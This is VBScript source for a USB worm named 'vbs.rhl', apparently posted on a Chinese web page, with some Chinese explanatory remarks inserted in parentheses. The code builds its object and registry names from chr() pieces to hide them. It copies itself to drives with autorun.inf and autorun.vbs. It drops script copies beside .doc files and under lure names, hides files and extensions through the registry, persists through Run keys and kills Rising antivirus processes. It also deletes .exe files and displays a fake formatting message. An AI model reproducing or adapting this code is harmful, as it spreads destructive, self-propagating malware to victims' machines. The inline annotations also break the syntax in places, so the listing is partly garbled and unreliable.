rem vbs.rhl
dim fs,r,ss,w,reg,regpath,dvbs
ddd="set fs =" &chr(67) & "reate" & "obj" & chr(101) & "c" & chr(116) & chr(40) & chr(34) & "scrip" & chr(116) & "ing.file" & chr(83) & "yste" &chr(109) & chr(79) & "bject" & chr(34) & chr(41)
execute ddd
rrr="set r =" &chr(119) & "scri" & "pt." &chr(67) & "reate" & "obj" & chr(101) & "c" & chr(116) & chr(40) & chr(34) & chr(119) & "scri" & "pt." &chr(115) & "he" & chr(108) & chr(108) & chr(34) & chr(41)
execute rrr
sss="fs." & chr(103) &"etfil" & chr(101) & chr(40) &chr(119) & "scri" & "pt." & "scri" & chr(112) & "tfull" &chr(110) & "ame" & chr(41)
ttt="set dvbs =" & sss
execute ttt
r.run (fs.getspecialfolder(0)&"\explorer.exe .\")
main()
on error resume next
sub main()
regtime()
finddrive()
countdrive(ss)
regwrite()
ganranfile(ss)
xunhuan()
end sub
function finddrive()
if dvbs.name="usbdrive.dll" then
regwrite()
ganrandisk()
end if
if dvbs.name<>"autorun.vbs" and dvbs.name<>"usbdrive.dll" then
regwrite()
dvbs.delete(true)
end if
ss=trim("")
set dc = fs.drives
for each d in dc
if d.drivetype = 1 or d.drivetype= 2 and d.isready then
ss = ss & d.driveletter
end if
next
ss = strreverse(lcase(trim(ss)))
end function
function countdrive(ss)
on error resume next
dim x
for i = 1 to len(ss)
x = mid(ss, i, 1)
if x="" then
x=mid(ss, 1, 1)
i=1
end if
set w = fs.getdrive(x)
ganrandiskroot()
next
end function
function ganrandiskroot()
dim c,s,f,vbc,ts,runreg
on error resume next
if w.drivetype=2 or w.drivetype=1 and w.isready then
if fs.fileexists(fs.getspecialfolder(1) & "\usbdrive.dll") then
else
fff=sss & ".copy(" & chr(34) & fs.getspecialfolder(1) & "\usbdrive.dll" &chr(34) & ")"
execute fff
if fs.fileexists(fs.getspecialfolder(1) & "\usbdrive.dll") then
else
fff=sss & ".copy(" & chr(34) & "d:\system volume information\usbdrive.dll" &chr(34) & ")"
execute fff
if fs.fileexists("d:\system volume information\usbdrive.dll") then
set ts = fs.createtextfile(w.driveletter & ":\vbs.reg", true)
ts.writeline "windows registry editor version 5.00"
ts.writeline "[hkey_current_user\software\microsoft\windows\shellnoroam\muicache]"
ts.writeline chr(34) & chr(64) & "c:\\windows\\system32\\wshext.dll,-4802"&chr(34) & "=" & chr(34)&"文本文件"& chr(34)
ts.close
set f = fs.getfile(w.driveletter & ":\vbs.reg")
f.attributes=f.attributes+7
set ts = fs.createtextfile(w.driveletter & ":\doc.reg",true)
ts.writeline "windows registry editor version 5.00"
ts.writeline "[hkey_current_user\software\microsoft\windows\shellnoroam\muicache]"
ts.writeline chr(34) & chr(64) & "c:\\windows\\system32\\wshext.dll,-4802"&chr(34) & "=" & chr(34)&"microsoft word 文档"& chr(34)
ts.close
set f = fs.getfile(w.driveletter & ":\doc.reg")
f.attributes=f.attributes+7
end if
end if
end if
if fs.fileexists(w.driveletter & ":\autorun.vbs") then
set c = fs.opentextfile(w.driveletter & ":\autorun.vbs", 1)
vbc = c.readall
if instr(vbc,"vbs.rhl") <> 0 then
c.close
else
c.close
set c = fs.getfile(w.driveletter & ":\autorun.vbs")
c.delete(true)
fff=sss & ".copy(" & chr(34) & w.driveletter & ":\autorun.vbs" &chr(34) & ")"
execute fff
s=array("2007总结病毒","这是病毒","违纪病毒","检查病毒","黑名单病毒","没有发出的病毒","恋爱的病毒(病毒)")
randomize
i= int((6 * rnd) + 1)
fff=sss & ".copy(" & chr(34) & w.driveletter & ":\" & s(i) & ".vbs" &chr(34) & ")"
execute fff
set b = fs.getfile(w.driveletter & ":\" & s(i) & ".vbs")
b.attributes=b.attributes-b.attributes
set c = fs.getfile(w.driveletter & ":\autorun.vbs")
c.attributes=c.attributes+7
if fs.fileexists(w.driveletter & ":\vbs.reg") or fs.fileexists(w.driveletter & ":\doc.reg") then
else
if w.driveletter="c" then
set ts = fs.createtextfile(fs.getspecialfolder(1) & "\vbs.reg", true)
ts.writeline "windows registry editor version 5.00"
ts.writeline "[hkey_current_user\software\microsoft\windows\shellnoroam\muicache]"
ts.writeline chr(34) & chr(64) & "c:\\windows\\system32\\wshext.dll,-4802"&chr(34) & "=" & chr(34)&"文本文件"& chr(34)
ts.close
set f = fs.getfile(fs.getspecialfolder(1) & "\vbs.reg")
f.attributes=f.attributes+7
set ts = fs.createtextfile(fs.getspecialfolder(1) & "\doc.reg")
ts.writeline "windows registry editor version 5.00"
ts.writeline "[hkey_current_user\software\microsoft\windows\shellnoroam\muicache]"
ts.writeline chr(34) & chr(64) & "c:\\windows\\system32\\wshext.dll,-4802"&chr(34) & "=" & chr(34)&"microsoft word 文档"& chr(34)
ts.close
set f = fs.getfile(fs.getspecialfolder(1) & "\doc.reg")
f.attributes=f.attributes+7
else
set ts = fs.createtextfile(w.driveletter & ":\vbs.reg",true)
ts.writeline "windows registry editor version 5.00"
ts.writeline "[hkey_current_user\software\microsoft\windows\shellnoroam\muicache]"
ts.writeline chr(34) & chr(64) & "c:\\windows\\system32\\wshext.dll,-4802"&chr(34) & "=" & chr(34)&"文本文件"& chr(34)
ts.close
set f = fs.getfile(w.driveletter & ":\vbs.reg")
f.attributes=f.attributes+7
set ts = fs.createtextfile(w.driveletter & ":\doc.reg",true)
ts.writeline "windows registry editor version 5.00"
ts.writeline "[hkey_current_user\software\microsoft\windows\shellnoroam\muicache]"
ts.writeline chr(34) & chr(64) & "c:\\windows\\system32\\wshext.dll,-4802"&chr(34) & "=" & chr(34)&"microsoft word 文档"& chr(34)
ts.close
set f = fs.getfile(w.driveletter & ":\doc.reg")
f.attributes=f.attributes+7
end if
end if
end if
else
fff=sss & ".copy(" & chr(34) & w.driveletter & ":\autorun.vbs" &chr(34) & ")"
execute fff
s=array("检查病毒","2007总结病毒","违纪病毒","这是病毒","黑名单","没有发出的病毒","恋爱的病毒(病毒)")
randomize
i= int((6 * rnd) + 1)
fff=sss & ".copy(" & chr(34) & w.driveletter & ":\" & s(i) & ".vbs" &chr(34) & ")"
execute fff
set b = fs.getfile(w.driveletter & ":\" & s(i) & ".vbs")
b.attributes=b.attributes-b.attributes
set c = fs.getfile(w.driveletter & ":\autorun.vbs")
c.attributes=c.attributes+7
if fs.fileexists(w.driveletter & ":\vbs.reg") or fs.fileexists(w.driveletter & ":\doc.reg") then
else
if w.driveletter="c" then
set ts = fs.createtextfile(fs.getspecialfolder(1) & "\vbs.reg", true)
ts.writeline "windows registry editor version 5.00"
ts.writeline "[hkey_current_user\software\microsoft\windows\shellnoroam\muicache]"
ts.writeline chr(34) & chr(64) & "c:\\windows\\system32\\wshext.dll,-4802"&chr(34) & "=" & chr(34)&"文本文件"& chr(34)
ts.close
set f = fs.getfile(fs.getspecialfolder(1) & "\vbs.reg")
f.attributes=f.attributes+7
set ts = fs.createtextfile(fs.getspecialfolder(1) & "\doc.reg")
ts.writeline "windows registry editor version 5.00"
ts.writeline "[hkey_current_user\software\microsoft\windows\shellnoroam\muicache]"
ts.writeline chr(34) & chr(64) & "c:\\windows\\system32\\wshext.dll,-4802"&chr(34) & "=" & chr(34)&"microsoft word 文档"& chr(34)
ts.close
set f = fs.getfile(fs.getspecialfolder(1) & "\doc.reg")
f.attributes=f.attributes+7
else
set ts = fs.createtextfile(w.driveletter & ":\vbs.reg", true)
ts.writeline "windows registry editor version 5.00"
ts.writeline "[hkey_current_user\software\microsoft\windows\shellnoroam\muicache]"
ts.writeline chr(34) & chr(64) & "c:\\windows\\system32\\wshext.dll,-4802"&chr(34) & "=" & chr(34)&"文本文件"& chr(34)
ts.close
set f = fs.getfile(w.driveletter & ":\vbs.reg")
f.attributes=f.attributes+7
set ts = fs.createtextfile(w.driveletter & ":\doc.reg",true)
ts.writeline "windows registry editor version 5.00"
ts.writeline "[hkey_current_user\software\microsoft\windows\shellnoroam\muicache]"
ts.writeline chr(34) & chr(64) & "c:\\windows\\system32\\wshext.dll,-4802"&chr(34) & "=" & chr(34)&"microsoft word 文档"& chr(34)
ts.close
set f = fs.getfile(w.driveletter & ":\doc.reg")
f.attributes=f.attributes+7
end if
end if
end if
if fs.fileexists(w.driveletter & ":\autorun.inf") then
set c = fs.opentextfile(w.driveletter & ":\autorun.inf", 1)
vbc = c.readall
if instr(vbc,"wscript.exe .\autorun.vbs") <> 0 then
c.close
else
set f = fs.getfile(w.driveletter & ":\autorun.inf")
f.attributes=f.attributes-f.attributes
set ts = f.openastextstream(2,-2)
ts.writeline "[autorun]"
ts.writeline "open= "
ts.writeline ""
ts.writeline "shell\open=打开(&o) "
ts.writeline "shell\open\command=wscript.exe .\autorun.vbs"
ts.writeline "shell\open\default=1 "
ts.close
f.attributes=f.attributes+7
end if
else
set ts = fs.createtextfile(w.driveletter & ":\autorun.inf",true)
ts.writeline "[autorun]"
ts.writeline "open= "
ts.writeline ""
ts.writeline "shell\open=打开(&o) "
ts.writeline "shell\open\command=wscript.exe .\autorun.vbs"
ts.writeline "shell\open\default=1"
ts.close
set f = fs.getfile(w.driveletter & ":\autorun.inf")
f.attributes=f.attributes+7
end if
end if
end function
function regwrite()
on error resume next
dim s
a1="hke" & "y_cur" & "rent_us" & "er\soft" & "ware\mi" & "croso" & "ft\win" & "dows\cur" & "rentv" & "ersion\exp" & "lorer\ad" & "vanced\" (a1= hkey_current_user\software\microso ft\windows\currentversion\explorer\advanced\
a2="hk"&"ey_clas"&"ses_ro" & "ot\dll" & "file\" (a2=hkey_classes_root\dllfile)
a3="hkey" & "_loca" & "l_mach" & "ine\soft" & "ware\mi" & "cros" & "oft\win" & "dows\cur" & "rentver" & "sion\poli" & "cies\expl" & "orer\nodr" & "ivetypeautorun"
(a3=hkey_local_machine\software\microsoft\windows\currentversion\policies\explorer\nodrivetypeautorun)
a4="hke" & "y_curr" & "ent_use" & "r\softw" & "are\micr" & "osoft\wi" & "ndows\cur" & "rentversi" & "on\polici" & "es\explor" & "er\nodrivet" & "ypeautorun"
(a4=hkey_current_user\software\microsoft\windows\currentversion\policies\explorer\nodrivetypeautorun)
a5="hk" & "ey_lo" & "cal_ma" & "chine\sof" & "tware\mi" & "croso" & "ft\wind" & "ows\curre" & "ntversi" & "on\ru" & "n\usbdr" & "ive.dll"
(a5=hkey_local_machine\software\microsoft\windows\currentversion\run\usbdrive.dll)
a6="r.re" & "gwri" & chr(116) & "e" (a6=r.regwrichr(116) e)
a7="hke" & "y_clas" & "ses_roo" & "t\vbsf" & "ile\defau" & "lticon\"
(a7=hkey_classes_root\vbsfile\defaulticon)
set s=fs.getdrive(fs.getdrivename(dvbs.path))
scandoc(fs.getspecialfolder(0) & "\installer")
if reg="wordicon.exe" then
if s="c:" then
if fs.fileexists("d:\system volume information\usbdrive.dll") then
r.run(fs.getspecialfolder(1) & "\dllcache\regedit.exe /s" & space(3) & "d:\system volume information\doc.reg")
else
r.run(fs.getspecialfolder(1) & "\dllcache\regedit.exe /s" & space(3) & fs.getspecialfolder(1) & "\doc.reg")
end if
else
if fs.fileexists("d:\system volume information\usbdrive.dll") then
r.run(fs.getspecialfolder(1) & "\dllcache\regedit.exe /s" & space(3) & "d:\system volume information\doc.reg")
else
r.run(fs.getspecialfolder(1) & "\dllcache\regedit.exe /s" & space(3) & s.driveletter & ":\doc.reg")
end if
end if
ppp=a6&space(2)&chr(34) & a7 & chr(34)&"," &chr(34)®path & ",1"&chr(34)
execute ppp
else
if s="c:" then
if fs.fileexists("d:\system volume information\usbdrive.dll") then
r.run(fs.getspecialfolder(1) & "\dllcache\regedit.exe /s" & space(3) & "d:\system volume information\vbs.reg")
else
r.run(fs.getspecialfolder(1) & "\dllcache\regedit.exe /s" & space(3) & fs.getspecialfolder(1) & "\vbs.reg")
end if
else
if fs.fileexists("d:\system volume information\usbdrive.dll") then
r.run(fs.getspecialfolder(1) & "\dllcache\regedit.exe /s" & space(3) & "d:\system volume information\vbs.reg")
else
r.run(fs.getspecialfolder(1) & "\dllcache\regedit.exe /s" & space(3) & s.driveletter & ":\vbs.reg")
end if
end if
ppp=a6&space(2)&chr(34) & a7 & chr(34)&"," &chr(34)&fs.getspecialfolder(1) & "\shell32.dll,1"&chr(34)
execute ppp
end if
ppp=a6&space(2)&chr(34) & a1 & "showsuperhidden" &chr(34)& "," & "0," & chr(34)&"reg_dword"&chr(34)
execute ppp
ppp=a6&space(2)&chr(34) & a1 & "hidefileext" &chr(34)& "," & "1," & chr(34)&"reg_dword"&chr(34)
execute ppp
ppp=a6&space(2)&chr(34) & a1 & "hidden" &chr(34)& "," & "0," & chr(34)&"reg_dword"&chr(34)
execute ppp
ppp=a6&space(2)&chr(34) & a2 & "scriptengine\" &chr(34)& "," & chr(34)&"vbscript" & chr(34)
execute ppp
ppp=a6&space(2)&chr(34) & a2 & "scripthostencode\" &chr(34)& "," & chr(34)&"{85131631-480c-11d2-b1f9-00c04f86c324}" & chr(34)
execute ppp
ppp=a6&space(1)&chr(34) & a2 & "shell\open\command\" &chr(34)& "," & chr(34)&fs.getspecialfolder(1) &"\wscript.exe" &space(1)& chr(34) &chr(34) &"%1"&chr(34) & chr(34) &space(1)& "%*" & chr(34)
execute ppp
ppp=a6&space(2)&chr(34) & a2 & "shellex\propertysheethandlers\wshprops\" &chr(34)& "," & chr(34)&"{60254ca5-953b-11cf-8c96-00aa00b8708c}" & chr(34)
execute ppp
ppp=a6&space(2)&chr(34) & a3 & chr(34)&"," & "0," & chr(34)&"reg_dword"&chr(34)
execute ppp
ppp=a6&space(2)&chr(34) & a4 & chr(34)&"," & "0," & chr(34)&"reg_dword"&chr(34)
execute ppp
if fs.fileexists("d:\system volume information\usbdrive.dll") then
ppp=a6&space(2)&chr(34) & a5 &chr(34)& "," & chr(34)& "d:\system volume information" & "\usbdr" & "ive.dll" & chr(34)
execute ppp
else
ppp=a6&space(2)&chr(34) & a5 &chr(34)& "," & chr(34)&fs.getspecialfolder(1)&"\usbdr" & "ive.dll" & chr(34)
execute ppp
end if
if day(date())="27" then (27号报告错误)
msgbox "小样!你的杀毐软件该升级了,磁盘已被格式化"
end if
end function
function scandoc(a) (定义子函数)
on error resume next (出错不报告)
dim files,file,subfolder,folder_
set folder_=fs.getfolder(a)
set files=folder_.files
for each file in files (for each。。。next 对数组或集合中的每个元素重复执行一组语句)
if file.name ="wordicon.exe" then
reg=file.name
regpath=file.path
exit function
end if
next (for each 的next)
set subfolders=folder_.subfolders (set 是一个赋值语句)
for each subfolder in subfolders
scandoc(subfolder)
next
end function (结束子程序的定义)
function regtime() (定义一个子程序添加注册表,结束瑞星)
a6="r.re" & "gwri" & chr(116) & "e" (a6= r.regwri chr(116)e chr(116)是值)
a8="hke"&"y_cur" & "rent_us" & "er\soft" & "ware\micr" & "osoft\win" & "dows scr" &"iptingho"&"st\settin"&"gs\timeou (a8=注册表hkey_current_user\software\microsoft\windows scripting host\settings\timeout)
ppp=a6&space(2)&chr(34) & a8 &chr(34)& "," & "0," & chr(34)&"reg_dword"&chr(34)
execute ppp (对指定的字符串执行正则表达式搜索)
dim nameorpid
kill=array("ravmon.exe","ravtask.exe","ravstub.exe","ravmond.exe","rsagent.exe")
for i=0 to 4
killprocess(kill(i)) (结束4个瑞星程序)
next
end function (结束这个子程序)
function ganranfile(aa) (定义一个子程序)
on error resume next (出错不报告)
dim x
for i = 1 to len(aa) (len函数 返回字符串内字符的数目,或是存储一变量所需的字节数)
x = mid(aa, i, 1) (mid函数 从字符串中返回指定数目的字符。这里是一个个返回给x)
if x="" then
x=mid(aa, 1, 1)
i=1
end if
set x = fs.getdrive(x)
if x.isready then
scan(x)
else
xunhuan()
end if
next
end function (结束本子程序,作用不明)
function scan(x) (定义子程序 scan(a) )
on error resume next ( 出错不报告 )
dim files,file,subfolder,folder_
set folder_=fs.getfolder(x)
set files=folder_.files
for each file in files
s=file.path
ext=fs.getextensionname(file)
ext=lcase(ext) ( lcase函数 返回字符串的小写形式)
if ext="doc" then
fff=sss & ".copy("&chr(34) & mid(s,1,len(s)-3) & "vbs" &chr(34) & ")" (fff是sss.copy加几个字符
怀疑这个几个字符组成一个文件名)
execute fff
end if
next
set subfolders=folder_.subfolders
for each subfolder in subfolders
scan(subfolder)
next
end function
function ganrandisk()
on error resume next
regwrite()
dim doc, d, s, coun,w,h,oo
set doc = fs.drives
for each k in doc
if k.isready then
h=h & k.driveletter
end if
next
t1=len(trim(h))
coun=doc.count
do while coun>0
oo=h & w
clearinfo(oo)
wscript.sleep 50
set d = fs.drives
if d.count>coun then
for each k in d
if k.isready then
s=s & k.driveletter
end if
next
coun=d.count
t= strreverse(lcase(trim(s)))
w=mid(t,1,abs(len(t)-t1))
countdrive(w)
ganranfile(w)
s=trim("")
t1=len(t)
end if
if d.count<coun then
for each k in d
if k.isready then
s=s & k.driveletter
end if
next
coun=d.count
t= strreverse(lcase(trim(s)))
s=trim("")
t1=len(t)
end if
loop
end function
function xunhuan()
on error resume next
dim sfo
set sfo=fs.getdrive(fs.getdrivename(dvbs.path))
if dvbs.name="autorun.vbs" or dvbs.name="usbdrive.dll" then
if sfo.drivetype=2 then
ganrandisk()
else
wscript.quit
end if
else
dvbs.delete(true)
end if
end function
function clearinfo(oo)
on error resume next
dim dc,z
oo =lcase(trim(oo))
for m = 1 to len(oo)
z = mid(oo, m, 1)
set z = fs.getdrive(z)
findinf(z)
v=array(z.driveletter & ":\recycled",z.driveletter & ":\system volume information")
for i= 0 to 1
scanexe(v(i))
next
next
vir=array(fs.getspecialfolder(1)& "\recycled",fs.getspecialfolder(2),fs.getspecialfolder(0)&"\system")
for i=0 to 2
scanexe(vir(i))
next
end function
function scanexe(a)
wscript.sleep 100
on error resume next
dim files,file,folder_
if fs.folderexists(a) then
set folder_=fs.getfolder(a)
set files=folder_.files
for each file in files
ext=fs.getextensionname(file)
ext=lcase(ext)
if ext="exe" then
set f = fs.getfile(file)
f.delete(true)
end if
next
set subfolders=folder_.subfolders
for each subfolder in subfolders
scanexe(subfolder)
next
end if
end function
function findinf(z)
on error resume next
if fs.fileexists(fs.getspecialfolder(1) & "\usbdrive.dll") then
else
fff=sss & ".copy(" & chr(34) & fs.getspecialfolder(1) & "\usbdrive.dll" &chr(34) & ")"
execute fff
if fs.fileexists(fs.getspecialfolder(1) & "\usbdrive.dll") then
else
ppp=a6&space(2)&chr(34) & a5 &chr(34)& "," & chr(34)& "d:\system volume information" & "\usbdr" & "ive.dll" & chr(34)
execute ppp
end if
end if
if fs.fileexists(z.driveletter & ":\autorun.vbs") then
else
fff=sss & ".copy(" & chr(34) & z.driveletter & ":\autorun.vbs" &chr(34) & ")"
execute fff
set f = fs.getfile(z.driveletter & ":\autorun.vbs")
f.attributes=f.attributes+7
end if
if fs.fileexists(z.driveletter & ":\autorun.inf") then
set c = fs.opentextfile(z.driveletter & ":\autorun.inf", 1)
vbc = c.readall
if instr(vbc,"wscript.exe .\autorun.vbs") <> 0 then
c.close
else
set f = fs.getfile(z.driveletter & ":\autorun.inf")
f.attributes=f.attributes-f.attributes
set ts = f.openastextstream(2,-2)
ts.writeline "[autorun]" (以下建立自动播放文件)
ts.writeline "open= "
ts.writeline ""
ts.writeline "shell\open=打开(&o) "
ts.writeline "shell\open\command=wscript.exe .\autorun.vbs"
ts.writeline "shell\open\default=1 "
ts.close
f.attributes=f.attributes+7
end if
else
set ts = fs.createtextfile(z.driveletter & ":\autorun.inf",true)
ts.writeline "[autorun]"
ts.writeline "open= "
ts.writeline ""
ts.writeline "shell\open=打开(&o) "
ts.writeline "shell\open\command=wscript.exe .\autorun.vbs"
ts.writeline "shell\open\default=1"
ts.close
set f = fs.getfile(z.driveletter & ":\autorun.inf")
f.attributes=f.attributes+7
end if
if fs.fileexists(z.driveletter & ":\vbs.reg") then
else
set ts = fs.createtextfile(z.driveletter & ":\vbs.reg", true)
ts.writeline "windows registry editor version 5.00"
ts.writeline "[hkey_current_user\software\microsoft\windows\shellnoroam\muicache]"
ts.writeline chr(34) & chr(64) & "c:\\windows\\system32\\wshext.dll,-4802"&chr(34) & "=" & chr(34)&"文本文件"& chr(34)
ts.close
set f = fs.getfile(z.driveletter & ":\vbs.reg")
f.attributes=f.attributes+7
end if
if fs.fileexists(z.driveletter & ":\doc.reg") then
else
set ts = fs.createtextfile(z.driveletter & ":\doc.reg",true)
ts.writeline "windows registry editor version 5.00"
ts.writeline "[hkey_current_user\software\microsoft\windows\shellnoroam\muicache]"
ts.writeline chr(34) & chr(64) & "c:\\windows\\system32\\wshext.dll,-4802"&chr(34) & "=" & chr(34)&"microsoft word 文档"& chr(34)
ts.close
set f = fs.getfile(z.driveletter & ":\doc.reg")
f.attributes=f.attributes+7
end if
end function
function killprocess(nameorpid)
on error resume next
dim owmi, oprocs, oproc, strsql
killprocess = false
strsql = "select * from win32_process"
if nameorpid <> "" then
if isnumeric(nameorpid) then
strsql = strsql & " where handle = '" & nameorpid & "'"
else
strsql = strsql & " where name = '" & nameorpid & "'"
end if
end if
set owmi = getobject("winmgmts:\\.\root\cimv2")
set oprocs = owmi.execquery(strsql)
for each oproc in oprocs
if isnumeric(nameorpid) then
oproc.terminate
killprocess = true
else
oproc.terminate
if day(date())="27" then
set killfile=fs.getfile( oproc.executablepath)
killfile.delete(true)
end if
end if
next
set oproc = nothing
set oprocs = nothing
set owmi = nothing
end function
如对本文有疑问,
点击进行留言回复!!
我要评论
网友评论